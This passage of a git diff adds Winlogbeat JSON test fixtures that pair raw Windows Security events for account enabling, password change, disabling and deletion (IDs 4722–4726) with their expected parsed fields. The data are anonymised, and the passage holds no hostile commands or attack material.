user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4722", + "kind": 
"event", + "module": "security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:53:57.535000Z", + "action": { + "id": 4722, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserName": "account-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "ACC_NAME" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account-name" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account-name", + "target": { + "domain": "DOMAIN", + "name": "ACC_NAME" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4722", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a13c3fc" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + 
"provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042939152", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json new file mode 100644 index 000000000..ac581308e --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4723.json 
@@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount 
Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 
Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4723", + "kind": "event", + "module": "security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:59:04.757000Z", + "action": { + "id": 4723, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserName": "ACCOUNT", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "123456-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": 
"PC01.domain.com", + "event_id": "4723", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a28ebbf" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13043050897", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json new file mode 100644 index 000000000..d3826be97 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4725.json 
@@ -0,0 +1,111 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was 
disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4725", + "kind": "event", + "module": "security", + 
"original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:41:11.055000Z", + "action": { + "id": 4725, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserName": "jdoe", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-4-5-6", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "jdoe", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4725", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x493fa12d" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 
"13042691344", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json new file mode 100644 index 000000000..73c1d823c --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4726.json 
@@ -0,0 +1,84 @@ +{ + "input": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": 
"{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget 
Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T07:58:13.288000Z", + "action": { + "id": 4726, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3005c1f76", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "name": "hostname", + "type": "winlogbeat", + "version": "7.17.1" + }, + "host": { + "name": "hostname.domain.net" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "doe.j" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "doe.j", + "target": { + "domain": "DOMAIN", + "name": "smithee.a" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.domain.net", + "event_id": "4726", + "logon": { + "id": "0x3005c1f76" + }, + "process": { + "pid": 632, + "thread": { + "id": 2056 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "25349190364", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json new file mode 100644 index 000000000..c7ac196ea --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4768.json 
